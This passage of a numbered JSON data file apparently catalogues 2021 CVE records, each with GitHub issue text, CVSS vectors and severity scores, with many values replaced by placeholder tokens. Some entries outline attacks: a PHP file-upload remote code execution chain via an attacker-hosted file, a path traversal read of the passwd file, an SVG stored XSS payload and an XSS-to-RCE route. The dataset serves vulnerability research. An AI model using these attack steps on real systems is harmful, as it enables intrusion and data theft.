  66581. "description": "Use after free when opening a new document. Describe the bug This only happen if APITAG reopen the last document. This need leocad compiled with address sanitizer. Rough patch: CODETAG To Reproduce Steps to reproduce the behavior NUMBERTAG Start leocad with the last document reopened NUMBERTAG File > New NUMBERTAG Crash Expected behavior Shouldn't crash Stack trace ERRORTAG Version (please complete the following information): OS: Linux Fedora NUMBERTAG APITAG Version: git master commit APITAG",
  66582. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66583. "severity": "MEDIUM",
  66584. "baseScore": 5.5,
  66585. "impactScore": 3.6,
  66586. "exploitabilityScore": 1.8
  66587. },
  66588. {
  66589. "CVE_ID": "CVE-2021-31926",
  66590. "Issue_Url_old": "https://github.com/CubeCoders/AMP/issues/443",
  66591. "Issue_Url_new": "https://github.com/cubecoders/amp/issues/443",
  66592. "Repo_new": "cubecoders/amp",
  66593. "Issue_Created_At": "2021-04-24T12:42:45Z",
  66594. "description": "Can add custom ports without permission. Bug Report System Information Operating System NUMBERTAG amd NUMBERTAG SMP Debian NUMBERTAG APITAG AMP version and build date NUMBERTAG built PATHTAG NUMBERTAG Which AMP release stream you're using Mainline I confirm: FILETAG NUMBERTAG Created a Test user with the following permissions (the user is not member of any group) FILETAG NUMBERTAG Login with a super admin and check the instance ports FILETAG NUMBERTAG Login with the Test user, click on the Minecraft Instance and then APITAG ports\" FILETAG NUMBERTAG Click on the \"+\" in the dialog and then APITAG NUMBERTAG Check again the ports with the super admin FILETAG NUMBERTAG A new port has been added On the step NUMBERTAG if I do APITAG changes\" it will give me this error FILETAG",
  66595. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  66596. "severity": "MEDIUM",
  66597. "baseScore": 6.5,
  66598. "impactScore": 3.6,
  66599. "exploitabilityScore": 2.8
  66600. },
  66601. {
  66602. "CVE_ID": "CVE-2021-3195",
  66603. "Issue_Url_old": "https://github.com/bitcoin/bitcoin/issues/20866",
  66604. "Issue_Url_new": "https://github.com/bitcoin/bitcoin/issues/20866",
  66605. "Repo_new": "bitcoin/bitcoin",
  66606. "Issue_Created_At": "2021-01-06T10:39:23Z",
  66607. "description": "Restrict RPCs that make server side files. Currently dumpwallet and other RPCs can scribble all over the file system, at least as the user running bitcoind permits. It would be better if these were at the least limited to the data directory, or even a specific directory within the data directory, say, APITAG \u2014to avoid name collisions with wallets, lock files and database files. Overwriting is already prevented.",
  66608. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  66609. "severity": "HIGH",
  66610. "baseScore": 7.5,
  66611. "impactScore": 3.6,
  66612. "exploitabilityScore": 3.9
  66613. },
  66614. {
  66615. "CVE_ID": "CVE-2021-3200",
  66616. "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/416",
  66617. "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/416",
  66618. "Repo_new": "opensuse/libsolv",
  66619. "Issue_Created_At": "2020-12-13T05:52:11Z",
  66620. "description": "libsolv \u201ctestcase_read\u201d function a heap overflow vulnerability. Description: There is a heap overflow bug in function: Solver APITAG pool, FILE fp, const char testcase, Queue job, char resultp, int resultflagsp) at src/testcase.c: line NUMBERTAG APITAG The libsolv defines MAPCLR(m, n) as following: APITAG , which means that MAPCLR(pool >considered, p) is same as APITAG The type of variable \u201cpool >considered\u201d is a Map structure. The definition of the structure Map as following: ERRORTAG If the value of the index variable \u201cp NUMBERTAG is bigger than pool >considered >size, there will be a heap buffer overflow bug. Our APITAG file can trigger this bug. Please reproduce this issue through the following APITAG PATHTAG APITAG testcase_read NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: disable: unknown package 'A NUMBERTAG noarch APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG d1 at pc NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG e bp NUMBERTAG ffffc NUMBERTAG sp NUMBERTAG ffffc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG d1 thread T NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG d in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG fa8abf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG d1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f NUMBERTAG be7f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG dba in map_init PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG a in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG fa8abf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in testcase_read Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c 
NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING The ASAN outputs information about this overflow bug. And attacker can use this bug to achieve a APITAG attack. Please reproduce and fix this bug.",
  66621. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  66622. "severity": "LOW",
  66623. "baseScore": 3.3,
  66624. "impactScore": 1.4,
  66625. "exploitabilityScore": 1.8
  66626. },
  66627. {
  66628. "CVE_ID": "CVE-2021-32053",
  66629. "Issue_Url_old": "https://github.com/hapifhir/hapi-fhir/issues/2641",
  66630. "Issue_Url_new": "https://github.com/hapifhir/hapi-fhir/issues/2641",
  66631. "Repo_new": "hapifhir/hapi-fhir",
  66632. "Issue_Created_At": "2021-05-06T14:26:38Z",
  66633. "description": "Potential Denial of Service in JPA Server via history operation. A weakness in our handling of FHIR history URLTAG operations has been reported. Specifically, on a server with a very large number of resources, if the history operation is executed by many clients (e.g NUMBERTAG concurrently, the server becomes unresponsive and ultimately consumes a large amount of disk and becomes unstable. Our investigation has revealed that the root cause is a APITAG query that executes at the start of all APITAG operations. Essentially, anytime a APITAG is executed, the server executes NUMBERTAG SQL statements (statements here are approximate NUMBERTAG A APITAG is performed to supply a value for ERRORTAG NUMBERTAG A APITAG is performed to supply the contents The second query is executed against an index and is very fast. The first query by its nature requires a full index scan and is slow. Executing it NUMBERTAG concurrent times quickly overwhelms the database and leads to timeouts, exceptions, and eventually instability. The proposed fix is as follows: A new APITAG setting is added. This setting introduces a \"history count mode\" with NUMBERTAG options: Cached. This is the new default: A loading cache will be used for history counts, meaning that counts are stored in RAM for up to one minute, and the loading cache blocks all but one client thread per JVM from actually performing the count. This effectively throttles access to the database. Not cached. This is the status quo and does exhibit the weakness described here, but may be appropriate in scenarios where users are trusted and accuracy is always required. No count. This setting avoids the count query entirely, saving time and avoiding this weakness at the expense of not including any total in the response. A huge thanks to Zachary Minneker at Security Innovation who discovered and submitted a responsible disclosure of this issue. This issue will be resolved for the upcoming NUMBERTAG release. 
A CVE number is forthcoming.",
  66634. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  66635. "severity": "MEDIUM",
  66636. "baseScore": 5.3,
  66637. "impactScore": 1.4,
  66638. "exploitabilityScore": 3.9
  66639. },
  66640. {
  66641. "CVE_ID": "CVE-2021-32061",
  66642. "Issue_Url_old": "https://github.com/sa7mon/S3Scanner/issues/122",
  66643. "Issue_Url_new": "https://github.com/sa7mon/s3scanner/issues/122",
  66644. "Repo_new": "sa7mon/s3scanner",
  66645. "Issue_Created_At": "2021-11-28T21:06:52Z",
  66646. "description": "CVETAG : Path Traversal via dump of malicious bucket. tl;dr In version NUMBERTAG and older of APITAG if a user attempts to dump the contents of a bucket which contains objects with special characters in their keys, those characters can be used to save the files outside of the folder specified with APITAG . Thanks I'd like to give a huge thanks to a security researcher named APITAG URLTAG for reporting this issue to me. They provided a detailed explanation and helped walk me through the steps to reproduce. Very excellent experience. The Bug The issue is what's commonly known as a \"path traversal\" vulnerability. In this case, though, it's the ability to save files outside the intended area as opposed to reading files. For example: this bucket was created by APITAG for demonstration purposes. APITAG See how the object keys contain APITAG ? When APITAG goes to download that file, it concatenates the dump directory and this key to form the file path the file should get downloaded to. So if a user ran the following command: APITAG they would end up with a file called APITAG in APITAG which is one level up from where they wanted it. By adding a bunch of these characters together ( APITAG ) an attacker could craft a malicious object key which would place their file anywhere on the APITAG user's system. You may be surprised (like I was) to learn that AWS allows such characters in object keys. Their documentation FILETAG that while you can do this, there are limitations: > ... > > In addition, be aware of the following prefix limitations: > > Objects with a prefix of \"./\" must uploaded or downloaded with the AWS Command Line Interface (AWS CLI), AWS SDKs, or REST API. You cannot use the Amazon S3 console. > > Objects with a prefix of \"../\" cannot be uploaded using the AWS Command Line Interface (AWS CLI) or Amazon S3 console. 
In the \"real world\" the chances of an APITAG user encountering a bucket with these \"malicious\" keys are very low, especially considering I was not able to create such a bucket of my own. This threat poses a fairly low risk since the difficulty of pulling off the attack is a bit high and would only happen if a bad actor was purposely targeting users of this tool. APITAG has engaged MITRE who has reserved CVETAG CVETAG for this vulnerability. The CVE will be updated after this advisory has been posted. Remediation The good news is that I have already pushed the fix for this issue NUMBERTAG If an object to be downloaded has a key that would land outside of the APITAG , the file won't be downloaded. The user will get a message that looks like this: APITAG I'll be drafting the NUMBERTAG release to push out this update across the git repo, APITAG package, and Docker image.",
  66647. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  66648. "severity": "MEDIUM",
  66649. "baseScore": 5.3,
  66650. "impactScore": 1.4,
  66651. "exploitabilityScore": 3.9
  66652. },
  66653. {
  66654. "CVE_ID": "CVE-2021-32074",
  66655. "Issue_Url_old": "https://github.com/hashicorp/vault-action/issues/205",
  66656. "Issue_Url_new": "https://github.com/hashicorp/vault-action/issues/205",
  66657. "Repo_new": "hashicorp/vault-action",
  66658. "Issue_Created_At": "2021-04-20T17:51:47Z",
  66659. "description": "Exposes secrets in plaintext. When using NUMBERTAG actions output secrets in plaintext, here's an example pipeline output APITAG pipeline itself CODETAG",
  66660. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66661. "severity": "HIGH",
  66662. "baseScore": 7.5,
  66663. "impactScore": 3.6,
  66664. "exploitabilityScore": 3.9
  66665. },
  66666. {
  66667. "CVE_ID": "CVE-2021-3210",
  66668. "Issue_Url_old": "https://github.com/BloodHoundAD/BloodHound/issues/338",
  66669. "Issue_Url_new": "https://github.com/bloodhoundad/bloodhound/issues/338",
  66670. "Repo_new": "bloodhoundad/bloodhound",
  66671. "Issue_Created_At": "2020-06-21T16:20:56Z",
  66672. "description": "XSS in APITAG leading to RCE via imported malicious data file. The help text modal utilizes the React component attribute APITAG when rendering the Info , Abuse Info , etc. texts. E.g. URLTAG This makes the application vulnerable to XSS unless the input parameters are properly sanitized/encoded. It turns out that the parameter APITAG (objectid) isn't encoded, and is reflected in multiple Abuse Info texts making the application vulnerable. URLTAG Since Bloodhound is built using Electron, it is possible to spawn child processes from an XSS vector leading to a RCE vulnerability. By getting the victim to import a malicious data graph file and clicking Help on an edge connected to a malicious node, the XSS payload will trigger. To mitigate this, encoding objectid the same way the node labels are encoded should do the trick. APITAG APITAG I've attached a zip, FILETAG , containing a malicious file, APITAG . APITAG may need to unzip and manually import the JSON file NUMBERTAG Import the file APITAG into APITAG NUMBERTAG Click Help on the edge between APITAG and APITAG NUMBERTAG This should pop APITAG FILETAG",
  66673. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  66674. "severity": "CRITICAL",
  66675. "baseScore": 9.6,
  66676. "impactScore": 6.0,
  66677. "exploitabilityScore": 2.8
  66678. },
  66679. {
  66680. "CVE_ID": "CVE-2021-32132",
  66681. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1753",
  66682. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1753",
  66683. "Repo_new": "gpac/gpac",
  66684. "Issue_Created_At": "2021-04-22T08:05:19Z",
  66685. "description": "null dereference issue in APITAG abst_box_size. Hi, There is a null dereference issue in gpac APITAG abst_box_size, this can be reproduced on the latest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66686. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66687. "severity": "MEDIUM",
  66688. "baseScore": 5.5,
  66689. "impactScore": 3.6,
  66690. "exploitabilityScore": 1.8
  66691. },
  66692. {
  66693. "CVE_ID": "CVE-2021-32134",
  66694. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1756",
  66695. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1756",
  66696. "Repo_new": "gpac/gpac",
  66697. "Issue_Created_At": "2021-04-23T00:50:46Z",
  66698. "description": "null dereference in APITAG gf_odf_desc_copy. Hi, There is a null dereference issue in gpac APITAG gf_odf_desc_copy, this can be reproduced on the latest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66699. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66700. "severity": "MEDIUM",
  66701. "baseScore": 5.5,
  66702. "impactScore": 3.6,
  66703. "exploitabilityScore": 1.8
  66704. },
  66705. {
  66706. "CVE_ID": "CVE-2021-32135",
  66707. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1757",
  66708. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1757",
  66709. "Repo_new": "gpac/gpac",
  66710. "Issue_Created_At": "2021-04-23T00:51:46Z",
  66711. "description": "null dereference in APITAG trak_box_size. Hi, There is a null dereference issue in gpac APITAG trak_box_size, this can be reproduced on the latest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66712. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66713. "severity": "MEDIUM",
  66714. "baseScore": 5.5,
  66715. "impactScore": 3.6,
  66716. "exploitabilityScore": 1.8
  66717. },
  66718. {
  66719. "CVE_ID": "CVE-2021-32136",
  66720. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1765",
  66721. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1765",
  66722. "Repo_new": "gpac/gpac",
  66723. "Issue_Created_At": "2021-04-30T00:42:12Z",
  66724. "description": "FILETAG",
  66725. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66726. "severity": "HIGH",
  66727. "baseScore": 7.8,
  66728. "impactScore": 5.9,
  66729. "exploitabilityScore": 1.8
  66730. },
  66731. {
  66732. "CVE_ID": "CVE-2021-32137",
  66733. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1766",
  66734. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1766",
  66735. "Repo_new": "gpac/gpac",
  66736. "Issue_Created_At": "2021-04-30T00:43:52Z",
  66737. "description": "FILETAG",
  66738. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66739. "severity": "MEDIUM",
  66740. "baseScore": 5.5,
  66741. "impactScore": 3.6,
  66742. "exploitabilityScore": 1.8
  66743. },
  66744. {
  66745. "CVE_ID": "CVE-2021-32138",
  66746. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1767",
  66747. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1767",
  66748. "Repo_new": "gpac/gpac",
  66749. "Issue_Created_At": "2021-04-30T00:45:19Z",
  66750. "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue in gpac APITAG APITAG can be reproduced on the latest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66751. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66752. "severity": "MEDIUM",
  66753. "baseScore": 5.5,
  66754. "impactScore": 3.6,
  66755. "exploitabilityScore": 1.8
  66756. },
  66757. {
  66758. "CVE_ID": "CVE-2021-32139",
  66759. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1768",
  66760. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1768",
  66761. "Repo_new": "gpac/gpac",
  66762. "Issue_Created_At": "2021-04-30T00:46:26Z",
  66763. "description": "null dereference in gpac APITAG gf_isom_vp_config_get. Hi, There is a null dereference issue in gpac APITAG gf_isom_vp_config_get, this can be reproduced on the latest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66764. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66765. "severity": "MEDIUM",
  66766. "baseScore": 5.5,
  66767. "impactScore": 3.6,
  66768. "exploitabilityScore": 1.8
  66769. },
  66770. {
  66771. "CVE_ID": "CVE-2021-3223",
  66772. "Issue_Url_old": "https://github.com/node-red/node-red-dashboard/issues/669",
  66773. "Issue_Url_new": "https://github.com/node-red/node-red-dashboard/issues/669",
  66774. "Repo_new": "node-red/node-red-dashboard",
  66775. "Issue_Created_At": "2021-01-11T04:39:02Z",
  66776. "description": "Path traversal . In FILETAG , the URL is matched PATHTAG ' and then passed to APITAG The lack of verification of the final path leads to a path traversal vulnerability. We can use this vulnerability to read sensitive data on the server, such as FILETAG . What are the steps to reproduce NUMBERTAG Install node red dashboard on node red server NUMBERTAG curl PATHTAG What happens? The server returns the passwd file content What do you expect to happen? ERRORTAG Please tell us about your environment: [x] Node RED Dashboard version NUMBERTAG Node RED version NUMBERTAG FILETAG version: APITAG [x] npm version NUMBERTAG Platform/OS: linux [ ] Browser: None",
  66777. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66778. "severity": "HIGH",
  66779. "baseScore": 7.5,
  66780. "impactScore": 3.6,
  66781. "exploitabilityScore": 3.9
  66782. },
  66783. {
  66784. "CVE_ID": "CVE-2021-3224",
  66785. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/28",
  66786. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/28",
  66787. "Repo_new": "cskaza/cszcms",
  66788. "Issue_Created_At": "2021-01-13T02:19:45Z",
  66789. "description": "Stored XSS Vulnerability In PATHTAG APITAG Hi\uff0c MENTIONTAG I found a Stored XSS Vulnerability In PATHTAG APITAG In content page APITAG content Parameter are not filtered\uff1a FILETAG FILETAG POC:a\u201d> APITAG FILETAG FILETAG FILETAG FILETAG FILETAG Author:leerina",
  66790. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66791. "severity": "MEDIUM",
  66792. "baseScore": 5.4,
  66793. "impactScore": 2.7,
  66794. "exploitabilityScore": 2.3
  66795. },
  66796. {
  66797. "CVE_ID": "CVE-2021-32243",
  66798. "Issue_Url_old": "https://github.com/FOGProject/fogproject/issues/422",
  66799. "Issue_Url_new": "https://github.com/fogproject/fogproject/issues/422",
  66800. "Repo_new": "fogproject/fogproject",
  66801. "Issue_Created_At": "2021-04-29T11:39:10Z",
  66802. "description": "APITAG NUMBERTAG File Upload RCE APITAG NUMBERTAG Create an empty NUMBERTAG Mb file. dd PATHTAG of=myshell bs NUMBERTAG count NUMBERTAG Add your PHP code to the end of the file created in the step NUMBERTAG echo ' APITAG ' >> myshell NUMBERTAG Put the file \"myshell\" accessible through HTTP. $ cp myshell PATHTAG NUMBERTAG Encode the URL to get \"myshell\" file to base NUMBERTAG APITAG Attacker IP). $ echo \" URLTAG \" | base NUMBERTAG APITAG NUMBERTAG isit URLTAG Example: URLTAG NUMBERTAG Appears a textbox, change the Kernel Name APITAG to FILETAG and click on Install NUMBERTAG isit URLTAG execute system whoami command",
  66803. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  66804. "severity": "HIGH",
  66805. "baseScore": 8.8,
  66806. "impactScore": 5.9,
  66807. "exploitabilityScore": 2.8
  66808. },
  66809. {
  66810. "CVE_ID": "CVE-2021-32245",
  66811. "Issue_Url_old": "https://github.com/pagekit/pagekit/issues/963",
  66812. "Issue_Url_new": "https://github.com/pagekit/pagekit/issues/963",
  66813. "Repo_new": "pagekit/pagekit",
  66814. "Issue_Created_At": "2021-04-30T08:11:10Z",
  66815. "description": "A stored XSS has been found in APITAG CMS affecting versions NUMBERTAG Problem A user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to PATHTAG that will point to FILETAG When a user comes along to click that link, it will trigger a XSS attack. exp.svg APITAG APITAG APITAG APITAG APITAG alert(/xss/); APITAG APITAG Technical Details Pagekit version NUMBERTAG Webserver: APITAG Database: APITAG PHP Version NUMBERTAG",
  66816. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66817. "severity": "MEDIUM",
  66818. "baseScore": 5.4,
  66819. "impactScore": 2.7,
  66820. "exploitabilityScore": 2.3
  66821. },
  66822. {
  66823. "CVE_ID": "CVE-2021-32263",
  66824. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/13",
  66825. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/13",
  66826. "Repo_new": "brackeen/ok-file-formats",
  66827. "Issue_Created_At": "2021-04-29T11:33:39Z",
  66828. "description": "heap buffer overflow in APITAG at APITAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Version dev version, git clone FILETAG Environment Ubuntu NUMBERTAG bit Reproduce test program ERRORTAG Compile test program with Address Sanitizer: APITAG Asan Report ERRORTAG APITAG FILETAG",
  66829. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66830. "severity": "HIGH",
  66831. "baseScore": 7.8,
  66832. "impactScore": 5.9,
  66833. "exploitabilityScore": 1.8
  66834. },
  66835. {
  66836. "CVE_ID": "CVE-2021-32268",
  66837. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1587",
  66838. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1587",
  66839. "Repo_new": "gpac/gpac",
  66840. "Issue_Created_At": "2020-09-04T15:05:21Z",
  66841. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG a NUMBERTAG e URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG disox ttxt NUMBERTAG dump chap ogg dump cover drtp bt out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  66842. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66843. "severity": "HIGH",
  66844. "baseScore": 7.8,
  66845. "impactScore": 5.9,
  66846. "exploitabilityScore": 1.8
  66847. },
  66848. {
  66849. "CVE_ID": "CVE-2021-32269",
  66850. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1574",
  66851. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1574",
  66852. "Repo_new": "gpac/gpac",
  66853. "Issue_Created_At": "2020-08-13T03:20:26Z",
  66854. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  66855. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66856. "severity": "MEDIUM",
  66857. "baseScore": 5.5,
  66858. "impactScore": 3.6,
  66859. "exploitabilityScore": 1.8
  66860. },
  66861. {
  66862. "CVE_ID": "CVE-2021-32270",
  66863. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1586",
  66864. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1586",
  66865. "Repo_new": "gpac/gpac",
  66866. "Issue_Created_At": "2020-09-04T14:58:11Z",
  66867. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG a NUMBERTAG e URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  66868. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66869. "severity": "MEDIUM",
  66870. "baseScore": 5.5,
  66871. "impactScore": 3.6,
  66872. "exploitabilityScore": 1.8
  66873. },
  66874. {
  66875. "CVE_ID": "CVE-2021-32271",
  66876. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1575",
  66877. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1575",
  66878. "Repo_new": "gpac/gpac",
  66879. "Issue_Created_At": "2020-08-15T01:36:37Z",
  66880. "description": "A stack buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso NUMBERTAG d diod latm keep utc out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  66881. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66882. "severity": "HIGH",
  66883. "baseScore": 7.8,
  66884. "impactScore": 5.9,
  66885. "exploitabilityScore": 1.8
  66886. },
  66887. {
  66888. "CVE_ID": "CVE-2021-32272",
  66889. "Issue_Url_old": "https://github.com/knik0/faad2/issues/57",
  66890. "Issue_Url_new": "https://github.com/knik0/faad2/issues/57",
  66891. "Repo_new": "knik0/faad2",
  66892. "Issue_Created_At": "2020-08-30T15:27:09Z",
  66893. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66894. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66895. "severity": "HIGH",
  66896. "baseScore": 7.8,
  66897. "impactScore": 5.9,
  66898. "exploitabilityScore": 1.8
  66899. },
  66900. {
  66901. "CVE_ID": "CVE-2021-32273",
  66902. "Issue_Url_old": "https://github.com/knik0/faad2/issues/56",
  66903. "Issue_Url_new": "https://github.com/knik0/faad2/issues/56",
  66904. "Repo_new": "knik0/faad2",
  66905. "Issue_Created_At": "2020-08-16T07:27:58Z",
  66906. "description": "A stack buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master eb NUMBERTAG fa URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66907. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66908. "severity": "HIGH",
  66909. "baseScore": 7.8,
  66910. "impactScore": 5.9,
  66911. "exploitabilityScore": 1.8
  66912. },
  66913. {
  66914. "CVE_ID": "CVE-2021-32274",
  66915. "Issue_Url_old": "https://github.com/knik0/faad2/issues/60",
  66916. "Issue_Url_new": "https://github.com/knik0/faad2/issues/60",
  66917. "Repo_new": "knik0/faad2",
